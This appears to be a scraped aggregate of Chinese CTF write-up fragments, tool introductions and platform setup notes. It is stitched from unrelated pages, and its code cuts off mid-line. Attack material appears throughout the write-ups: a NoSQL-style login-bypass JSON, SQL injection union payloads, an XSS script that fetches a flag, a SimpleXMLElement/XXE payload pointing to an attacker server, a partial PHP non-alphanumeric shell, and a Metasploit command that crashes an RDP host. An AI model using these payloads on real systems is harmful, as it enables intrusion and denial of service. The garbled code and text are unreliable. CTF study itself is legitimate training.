AntCTFxD^3CTF2021 部分WriteUp

AntCTFxD^3CTF Web ★8-bit pub 一般代码审计 登陆绕过，组一下就可以{"username":"admin","password":{"password":true}} 登陆后就是邮箱 readflag结果导入tmp/flag然后读就行了 exp： # coding:utf-8 import requests url = 'http://9267351e50.8bit-pub.d3ctf.io [].[];$_999=0;$_999++;$_999++;$_999++;$_=$_[$_999];$____=$_;''' par='_09' let_dic={} for i in range(3) : for j in range(3): for p in range(3): let_dic[chr(97+p+j*3+i*3*3)]="$_"+par 右键追踪流QUIC流 发现是HIS传输，筛选所有http3包，在Decrypted QUIC处发现HLS数据 然后多个人开始手动复制粘贴成文件，根据HEADERS区分文件 (学弟学妹y(老)y(工

CTF实战6 自动化Web安全测试工具

上次我们介绍了辅助工具的使用，现在我们开始玩点真的~ 什么是自动化 简单的来说就是你边看番吃着泡面边随手一点 等你看完吃完，测试也完成了 但是我们这里不打算介绍那些五花八门的各种利用工具 像下图这样的 我们可以通过设置这个来调整 我们这里是默认的3389，所以只用设置RHOST set RHOST 192.168.1.108 之后我们就直接执行 run 然后被攻击的靶机就蓝屏了 ok，这里只是粗略的介绍了这两个自动化工具的使用

CTF集合工具 or CTF平台

此工具包最初是基于精灵和一个佚名大佬的工具包整理的，后来加上平时打ctf和渗透时所添加的一些工具，应当还算全面。 并放出练习CTF的一个免费平台 https://ctf.bugku.com/challenges 里面包括了： PWN 逆向 杂项 WEB 分析 WEB进阶 代码审计 安卓 社工 加密 的内容。

CTF实战3 Wireshark网络嗅探工具使用

Wireshark可以打开多种网络分析软件捕捉的包，可以支持许多协议的解码。我们可以用它来检测网络安全隐患、解决网络问题，也可以用它来学习网络协议、测试协议执行情况等

T3N4CI0US CTF

IP : 34.64.203.138 Port : 10009 直接nc，find就出了 图片 T3N4CI0US{ZG9yb3Jvbmc/ZG9uZz9kaW5nPw} WEB world ，我谢谢你 图片 T3N4CI0US{aa84_c1372_0a89de3c3_f0_1316340332a_2a055c065} cigarette 图片 签到题，抓包得flag 图片 T3N4CI0US = 反复base64解码就会得到flag T3N4CI0US{d79fa6_2bc60_db3_5_da5512c3d_8896b7_0_2796d6_0cd} RE Swood string 图片 T3N4CI0US{da39a3ee5e6b4b0d3255bfef95601890afd80709} Warmup 一堆逻辑啥也不要问，签到题 图片 T3N4CI0US{773a_6d8c_c01fbc_f454646564 图片 就是找官网呗 T3N4CI0US{https://t3n4ci0us.kr/member/} CRYPTO french French Ciper V3Y4GK0FW{EccrEsXpvtjIcdc

AI辅助CTF自动化漏洞利用：从概念到实战

AI技术不仅能够辅助选手进行漏洞检测，甚至可以自动化完成部分或全部漏洞利用过程，彻底改变了CTF比赛的格局。 我们将结合DEFCON CTF、Pwn2Own等顶级赛事的真实案例，展示AI在自动化漏洞利用中的强大潜力，并通过代码演示，让读者亲身体验AI辅助CTF自动化漏洞利用的魅力。 四、DEFCON CTF 2024：AI自动化漏洞利用的经典案例 4.1 案例背景 DEFCON CTF 2024是全球顶级的网络安全竞赛，吸引了来自世界各地的顶尖安全团队。 六、AI辅助CTF自动化漏洞利用的未来展望 6.1 技术发展趋势 展望未来，AI辅助CTF自动化漏洞利用将呈现以下发展趋势： 全流程自动化：从漏洞发现到利用的端到端全流程自动化，进一步降低技术门槛。 结论 AI技术正在深刻改变CTF自动化漏洞利用的面貌，从自动化ROP链构造到智能Payload生成，从多漏洞组合利用到动态环境适应，AI已经成为CTF比赛中不可或缺的强大工具。

35c3CTF junior 部分web wp

'Origin': 'www.ckj123.com' } for i in xrange(100): html = requests.get(url+str(i)) if '35c3' = explode('-', $_); if (class_exists($args[0])) { new $args[0]($args[1], $args[2], $args[3] theme=SimpleXMlElement-http://服务器路径/1.xml-2-true 差不多的 https://mochazz.github.io/2018/07/08/%E4%BB%A3% E7%A0%81%E5%AE%A1%E8%AE%A1Day3%20-%20%E5%AE%9E%E4%BE%8B%E5%8C%96%E4%BB%BB%E6%84%8F%E5%AF%B9%E8%B1%A1% $note); echo '

BSidesSF CTF

a1ef0161.challenges.bsidessf.net/xss-one-flag").then(r=>r.text()).then(d=>d))})() </script> 得到flag CTF {XS5-W0rks-h3r3} Sequels: A New Bug We’ve decided to track known Jedi and Sith, so we put together 这道题首先是猜字段 Darth Bane' order by 3# 返回正常 Darth Bane' order by 4# 错误 Darth Bane' union select 1,2,3# (table_name),3 from information_schema.tables where table_schema="sequels1"# //得到俩表，flags和jedi 爆列名 1 # 读取value数据，得到flag CTF{help_me_hacker_youre_my_only_hope}

About CTF

概述 CTF全英是'Capture The Flag',中文名是'夺旗赛',起源于1996年DEFCON全球黑客大会，面对所有网络安全技术人员的一项比赛，CTF默认分为两个阶段，第一阶段以在网上答题提交相应的 flag获取分值，第二阶段由第一阶段获取到指定名次内的选手队伍参加线下的AWD攻防赛，CTF分为三种模式，分别是 解题模式:一般用于网络拔选 攻防模式:一般用于通过网络拔选之后，成绩靠前的队伍在线下参加 ，通过攻击别人的服务器夺分，防守自己的服务器防止掉分 混合模式:即解题和攻防混合在一起 题目类型 目前，CTF的类型主要为 PWN(漏洞攻击与利用),WEB(web),CRYPTO(密码学),MISC( index.html i春秋:https://www.ichunqiu.com/competition BUUCTF:https://buuoj.cn/challenges (文章均在侧边栏中的分类众的CTF

CTF学习|CG-CTF闯关笔记

而DEFCON作为CTF赛制的发源地，DEFCON CTF也成为了目前全球最高技术水平和影响力的CTF竞赛，类似于CTF赛场中的“世界杯” 。 目前网上提供了很多CTF靶场给大家训练，最近在玩一个CG-CTF的靶场，所以写个帖子记录一次，持续更新。 CG-CTF网址：https://cgctf.nuptsast.com/challenges#Web 下图是线下CTF比赛照片~当然我是不配的[aru_15]。 3.下意识查看一下源码，发现flag。 3.那我们换个思路，加密代码是包含在源码里的，CLsI应该是解密，那我们把源码里的eval换成echo，是不是就可以直接看到解密后的内容了？

Z3Py在CTF逆向中的运用

CTF逆向中的应用 现在的CTF逆向中，求解方程式或者求解约束条件是非常常见的一种考察方式，而ctf比赛都是限时的，当我们已经逆向出来flag的约束条件时，可能还需要花一定的时间去求解逆过程。 Z3求解器能够求解任意多项式，但是要注意的是，当方程的方式为2**x这种次方运算的时候，方程式已经不是多项式的范畴了，Z3便无法求解。 定义未知量 添加约束条件 然后求解 CTF中的示例 XXX比赛中的逆向题 首先我们利用IDA去打开该文件，定位到关键点，发现关键函数如下： ? 对于上面的题目我们首先定义x1,x2,x3,x4四个int变量，然后添加逆向中的约束条件，最后进行求解。Z3会在找到合适解的时候返回sat。我们认为Z3能够满足这些约束条件并得到解决方案。 题目链接：https://pan.baidu.com/s/1o8QdFIE 总结 虽然CTF逆向比赛中重点考察的是逆向的能力，采用求解器的方式来求解并不能锻炼到自己的逆向逻辑，REConvolution

CTF本地靶场搭建——GZ:CTF基础使用

GZ::CTF 是一个基于 ASP.NET Core 的开源 CTF 平台。

简介GZ::CTF 是一个基于 ASP.NET Core 的开源 CTF 平台，采用 Docker 或 K8s 作为容器部署后端，提供了可自定义的题目类型、动态容器和动态分值功能。

动态分值分值曲线：三血奖励： 平台对一二三血分别奖励 5%、3%、1% 的当前题目分值。 Docker 或 K8s 的动态容器分发、管理、多种端口映射方式基于 SignalR 的实时比赛通知、比赛事件和 flag 提交监控及日志监控SMTP 邮件验证功能、基于 Google ReCaptchav3 总的来说，GZ:CTF这个开源靶场确实还是制作的非常用心的，比CTFD好用一些，也推荐网络安全的学习者使用这个。

Hack the LAMPSecurity: CTF8 (CTF Challenge)

欢迎来到boot2root CTF挑战“LAMPSecurity：CTF8”由madirsh2600上传到vulnhub。因为，有一个主题，你需要获取flag以完成挑战，下载地址。 https://www.vulnhub.com/entry/lampsecurity-ctf8,87/ 根据作者描述，该漏洞靶机环境有很多种技术可以获得root权限。 OpenSSH 4.3 (protocol 2.0) | ssh-hostkey: | 1024 5e:ca:64:f0:7f:d2:1a:a2:86:c6:1f:c2:2a:b3: =PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP 参考链接： https://www.vulnhub.com/entry/lampsecurity-ctf8,87/

CTF本地靶场搭建——GZ:CTF安装

GZ:CTF项目地址:https://gitcode.com/GZTimeWalker/GZCTFGZCTF 是一款开源的网络安全竞技平台，由开发者GZTimeWalker维护。 该项目旨在提供一个环境，让网络安全爱好者和专业人士能够实践他们的技能，通过解决各种安全问题（即“旗标”或CTF题目）来学习和提升。

GZ:CTF部署

操作系统安装这里我选择使用的是Ubuntu 20.04.4 的操作系统，ISO文件下载地址如下：https://mirrors.163.com/ubuntu-releases 使用下列命令查看版本判断是否安装成功docker-compose -vdocker -v接下来到GZ:CTF根据文档部署，首先创建一个GZCTF文件夹，根据文档创建配置appsettings.json和

CTF简介

推荐 GOOD PRODUCT RECOMMENDATION CTF（Capture The Flag）中文一般译作夺旗赛，在网络安全领域中指的是网络安全技术人员之间进行技术竞技的一种比赛形式。 CTF起源于1996年DEFCON全球黑客大会，以代替之前黑客们通过互相发起真实攻击进行技术比拼的方式。发展至今，已经成为全球范围网络安全圈流行的竞赛形式。 CTF竞赛模式具体分为以下三类： 解 题 模 式 ? -Jeopardy- 可通过互联网或现场网络参与，解决网络安全技术挑战题目，并以分值和时间排名。 ////////// 主要的CTF题型 ////////// ? 一、MISC(Miscellaneous)类型 即安全杂项，题目或涉及流量分析、电子取证、人肉搜索、数据分析等等。

小记 - CTF

南邮CTF了解一下~ 密码学 JSfuck 标志：以[]开头,以()结尾 解密：JSfuck or 浏览器F12打开Console控制台,粘贴密文按回车即可解密 AAencode AAencode加解密 三个字节有24个比特，对应4个base64单元，即3个字节可表示4个可打印字符。 3整除，然后再进行base64的编码。 Decode -X -P password xxx.mp3 加密：encode -E （里面放要加密的txt信息） -P (密码) (需要将密码放入的wav文件) (生产的mp3文件) 解密：decode JPEG (jpg)，文件头：FFD8FFE0 文件尾：FF D9 PNG (png)，文件头：89504E47 GIF (gif)，GIF89A 文件头：47494638 XML (xml)，文件头：3C3F786D6C

CTF简介

一、CTF简介 Capture The Flag（以下简称”CTF”）,顾名思义，即是夺取旗帜，由于相关介绍已经比较完全完全，其简介可见百度知道:CTF词条。 CTF 二、CTF的题目类型 ​ CTF的题目类型大致包括以下五种： Web，Pwn，Misc， Reverse，Crypto Web ​ Web类题目大部分情况下和网、Web、HTTP等相关技能有关 三、CTF的比赛形式 CTF的比赛形式主要包括以下几种：理论类，[Jeopardy 解题]( #Jeopardy 解题)，[AwD 攻防](# AwD 攻防)，[RHG 自动化](#RHG 自动化) RHG 自动化 ​ Robo Hacking Game(RHG)该利用人工智能或是AI或是自动化攻击程序来全自动的挖掘并利用漏洞，考验选手对于漏洞理解以及工程化能力。 选手需要编写自动化程序来请求接口获取题目相关信息，该类程序通常称之为bot，在程序中全自动访问并挖掘目标漏洞，完成利用漏洞攻击并获取flag的过程。获取到的flag也由程序自动化提交。

CTF开发

具备环境搭建功能，与PHPstudy差不多，也可以一键切换版本，但PHP是要跟着老师走，下载了个PHPstudy

Paradigm CTF - SWAP

本文作者：bixia1994[1] 这大概是整个Paradigm CTF中难度最大的一道题，因为它同时考察两方面的内容，既考察你对於DEFI生态[2]的理解，也考察你对於ABI编码[3]和Solidity ....DDDDD //amount[0] DDDDD....DDDDD //amount[1] DDDDD....DDDDD //amount[2] DDDDD....DDDDD //amount[3] 查看文档可以看到： 0x00 - 0x3f (64 bytes): scratch space for hashing methods 0x40 - 0x5f (32 bytes): currently v.totalBalanceNorm = uint256(1); v.totalInNorm = uint256(2); v.amountToMint = uint256(3) 所以上面data中的0x3并不会拷贝到内存中，对整个数据拷贝过程没有影响。

FireShell CTF WriteUp

招新小广告 ChaMd5 ctf组 长期招新 尤其是reverse+pwn+合约的大佬 欢迎联系admin@chamd5.org Web Bad Injection 解题思路 任意文件下载： url = = 7 buf[2] = buf[2] * buf[3] = 16d5 buf[3] = 16d5 buf[4] = 5c buf[3] = buf[3] - buf[4] = 1679 buf[4] r3ally_c00l!}。 _D3lph1_D3lph1} Recon Welcome ? return a[3-i] i=i-3 while i!